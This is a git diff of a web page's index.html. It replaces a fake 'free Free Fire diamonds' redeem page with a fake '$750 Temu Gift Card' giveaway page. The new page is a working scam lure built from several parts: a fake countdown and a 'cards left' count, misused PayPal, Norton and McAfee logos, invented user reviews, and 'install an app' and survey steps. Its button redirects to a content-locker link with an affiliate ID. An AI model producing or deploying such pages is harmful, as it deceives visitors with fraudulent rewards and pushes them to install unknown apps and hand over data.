--- a/index.html
+++ b/index.html
@@ -3,152 +3,158 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Free Fire Diamond Redeem</title>
-  <link href="https://fonts.googleapis.com/css2?family=Rubik:wght@400;600&display=swap" rel="stylesheet">
+  <title>Claim $750 Temu Gift Card</title>
+  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
   <style>
-    * {
-      margin: 0;
-      padding: 0;
-      box-sizing: border-box;
-      font-family: 'Rubik', sans-serif;
-    }
+    * {margin:0;padding:0;box-sizing:border-box;font-family:'Roboto',sans-serif;}
     body {
-      background: linear-gradient(135deg, #ff416c, #ff4b2b);
-      display: flex;
-      justify-content: center;
-      align-items: center;
-      height: 100vh;
-      color: #fff;
+      background:#111;display:flex;justify-content:center;align-items:center;
+      min-height:100vh;padding:20px;
     }
     .container {
-      background: rgba(255, 255, 255, 0.1);
-      padding: 30px;
-      border-radius: 20px;
-      box-shadow: 0 8px 20px rgba(0,0,0,0.2);
-      backdrop-filter: blur(10px);
-      max-width: 400px;
-      text-align: center;
-      position: relative;
-      transition: 0.5s;
+      background:#1f1f1f;border-radius:16px;padding:30px;
+      max-width:480px;width:100%;text-align:center;
+      box-shadow:0 8px 24px rgba(0,0,0,0.6);
+      animation: popIn 0.8s ease-out;
     }
-    .container h1 {
-      font-size: 24px;
-      margin-bottom: 15px;
+    @keyframes popIn {
+      0% { transform: scale(0.9); opacity: 0; }
+      100% { transform: scale(1); opacity: 1; }
     }
-    .container p {
-      font-size: 14px;
-      margin-bottom: 15px;
+    .badge {
+      display:inline-block;background:#ff3b30;color:#fff;
+      padding:6px 16px;border-radius:20px;
+      font-size:0.85rem;font-weight:500;margin-bottom:16px;
     }
-    input {
-      width: 100%;
-      padding: 12px;
-      margin: 10px 0;
-      border: none;
-      border-radius: 10px;
-      font-size: 16px;
+    h1 {
+      font-size:2.2rem;color:#ffd60a;margin-bottom:8px;
+      text-shadow:0 0 6px rgba(255,214,10,0.6);
+    }
+    .subtitle {
+      font-size:1rem;color:#ccc;margin-bottom:12px;
+    }
+    .fomo {
+      font-size:1rem;color:#ff9f0a;margin-bottom:16px;
+      font-style:italic;
+    }
+    .timer {
+      font-size:1.1rem;font-weight:600;color:#34c759;margin-bottom:20px;
+    }
+    .trust-logos {
+      display:flex;justify-content:center;gap:20px;margin-bottom:20px;
+    }
+    .trust-logos img {
+      height:36px;filter:drop-shadow(0 2px 2px rgba(0,0,0,0.5));
+    }
+    .task {
+      background:#2c2c2c;border-radius:12px;padding:14px 16px;
+      margin:10px 0;display:flex;align-items:center;gap:12px;
+      transition:background 0.3s;
+      color:#fff;
+    }
+    .progress-bar {
+      background:#333;height:14px;border-radius:7px;
+      overflow:hidden;margin:20px 0;
+    }
+    .progress {
+      background:#0a84ff;height:100%;width:100%;
     }
     button {
-      width: 100%;
-      padding: 12px;
-      margin-top: 10px;
-      background-color: #fff;
-      color: #ff416c;
-      font-weight: 600;
-      font-size: 16px;
-      border: none;
-      border-radius: 10px;
-      cursor: pointer;
-      transition: 0.3s;
+      width:100%;padding:14px 0;background:#0a84ff;
+      color:#fff;font-size:1rem;font-weight:500;
+      border:none;border-radius:12px;cursor:pointer;
+      transition:background 0.3s, transform 0.2s;
     }
     button:hover {
-      background-color: #ffe6eb;
+      background:#0060df;transform:scale(1.02);
     }
-
-    /* Loading spinner */
-    .loading {
-      display: none;
-      margin-top: 20px;
+    .social-proof {
+      font-size:0.9rem;color:#bbb;margin:20px 0 10px;
     }
-    .loader {
-      border: 5px solid rgba(255, 255, 255, 0.2);
-      border-top: 5px solid #fff;
-      border-radius: 50%;
-      width: 40px;
-      height: 40px;
-      margin: 0 auto;
-      animation: spin 1s linear infinite;
+    .review {
+      background:#2a2a2a;padding:14px;border-radius:12px;
+      display:flex;gap:12px;margin:12px 0;
     }
-    @keyframes spin {
-      to { transform: rotate(360deg); }
+    .review img {
+      width:42px;height:42px;border-radius:50%;
     }
-
-    .loading p {
-      margin-top: 10px;
-      font-size: 16px;
+    .review-content p {
+      font-size:0.95rem;color:#fff;line-height:1.3;
     }
-
-    /* Success Message */
-    .success-message {
-      display: none;
-      margin-top: 20px;
-      background: rgba(0, 255, 128, 0.15);
-      padding: 20px;
-      border-radius: 15px;
-      animation: fadeIn 1s ease-in-out forwards;
-      box-shadow: 0 0 20px rgba(0,255,128,0.2);
+    .review-content span {
+      display:block;margin-top:6px;font-size:0.85rem;color:#aaa;
     }
-    .success-message h2 {
-      font-size: 20px;
-      color: #b8ffda;
-      margin-bottom: 10px;
+    .info {
+      font-size:0.85rem;color:#777;text-align:center;margin-top:20px;
     }
-    .success-message p {
-      font-size: 14px;
-      color: #d0ffe8;
-    }
-
-    @keyframes fadeIn {
-      from { opacity: 0; transform: scale(0.95); }
-      to { opacity: 1; transform: scale(1); }
+    @media(max-width:600px){
+      h1{font-size:1.8rem;}
     }
   </style>
 </head>
 <body>
   <div class="container">
-    <h1>🎁 Get 350 Diamonds Free!</h1>
-    <p>Enter your Free Fire UID to receive your reward instantly!</p>
-    <input type="text" id="uid" placeholder="Enter your Free Fire UID" required>
-    <button onclick="redeemNow()">Redeem Now</button>
+    <span class="badge">🇺🇸 USA Residents Only</span>
+    <h1>🎉 Congratulations!</h1>
+    <p class="subtitle">You've been selected to claim a <strong>$750 Temu Gift Card</strong></p>
+    <p class="fomo">⚠️ Only <strong>182</strong> cards left. Offer expires in:</p>
+    <p class="timer" id="countdown"></p>
 
-    <div class="loading" id="loading">
-      <div class="loader"></div>
-      <p>Processing your reward...</p>
+    <div class="trust-logos">
+      <img src="https://seeklogo.com/images/P/paypal-logo-448C4D3F34-seeklogo.com.png" alt="PayPal">
+      <img src="https://seeklogo.com/images/N/norton-logo-0CD8C24FFC-seeklogo.com.png" alt="Norton">
+      <img src="https://seeklogo.com/images/M/mcafee-logo-9FEF36F2F9-seeklogo.com.png" alt="McAfee">
     </div>
 
-    <div class="success-message" id="success">
-      <h2>✅ Congratulations!</h2>
-      <p>Your 350 Diamonds have been successfully added to your Free Fire account.</p>
+    <div class="task">📱 Step 1: Install an app & open 30s</div>
+    <div class="task">📝 Step 2: Complete a quick survey</div>
+
+    <div class="progress-bar">
+      <div class="progress"></div>
     </div>
+
+    <button onclick="verifyNow()">✅ Continue</button>
+
+    <div class="social-proof">🔹 <strong>4,398</strong> users claimed today</div>
+
+    <div class="review">
+      <img src="https://randomuser.me/api/portraits/women/68.jpg" alt="">
+      <div class="review-content">
+        <p>"Worked like magic! Got my card within 24 hours."</p>
+        <span>- Emma, NY</span>
+      </div>
+    </div>
+    <div class="review">
+      <img src="https://randomuser.me/api/portraits/men/45.jpg" alt="">
+      <div class="review-content">
+        <p>"Super fast process. Highly recommended!"</p>
+        <span>- Josh, CA</span>
+      </div>
+    </div>
+
+    <p class="info">✅ No credit card needed • Safe & Verified</p>
   </div>
 
   <script>
-    function redeemNow() {
-      const uid = document.getElementById("uid").value.trim();
-      const loading = document.getElementById("loading");
-      const success = document.getElementById("success");
+    // Timer
+    let timeLeft = 12 * 3600;
+    const countdownEl = document.getElementById('countdown');
+    function updateTimer() {
+      const h = Math.floor(timeLeft / 3600),
+            m = Math.floor((timeLeft % 3600) / 60),
+            s = timeLeft % 60;
+      countdownEl.textContent = `${h}h ${m}m ${s}s`;
+      if (timeLeft > 0) timeLeft--;
+    }
+    setInterval(updateTimer, 1000);
+    updateTimer();
 
-      if (uid.length >= 5) {
-        loading.style.display = "block";
-        success.style.display = "none";
-
-        // Simulate loading delay
-        setTimeout(() => {
-          loading.style.display = "none";
-          success.style.display = "block";
-        }, 3000);
-      } else {
-        alert("Please enter a valid Free Fire UID.");
-      }
+    // Continue Button
+    function verifyNow() {
+      document.querySelector('button').textContent = "Verifying...";
+      setTimeout(() => {
+        window.location.href = "https://singingfiles.com/show.php?l=0&u=2398455&id=67722";
+      }, 800);
     }
   </script>
 </body>
